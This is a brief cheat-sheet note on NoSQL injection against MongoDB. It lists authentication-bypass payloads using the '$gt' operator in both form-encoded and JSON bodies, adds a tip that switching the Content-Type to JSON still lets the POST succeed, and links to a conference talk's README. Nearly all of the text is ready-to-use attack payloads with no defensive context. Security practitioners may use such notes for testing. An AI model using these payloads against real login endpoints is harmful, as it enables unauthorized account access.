nosql injection
MongoDB:
- application/x-www-form-urlencoded => user[$gt]=&pass[$gt]=
- application/json => {user: {"$gt":""}, pass: {"$gt":""}}
Fun fact:
If the Content-Type is application/x-www-form-urlencoded,
changing it to application/json still allows the POST to succeed
with POST data. https://github.com/riyazwalikar/injection-attacks-nosql-talk/blob/master/README.md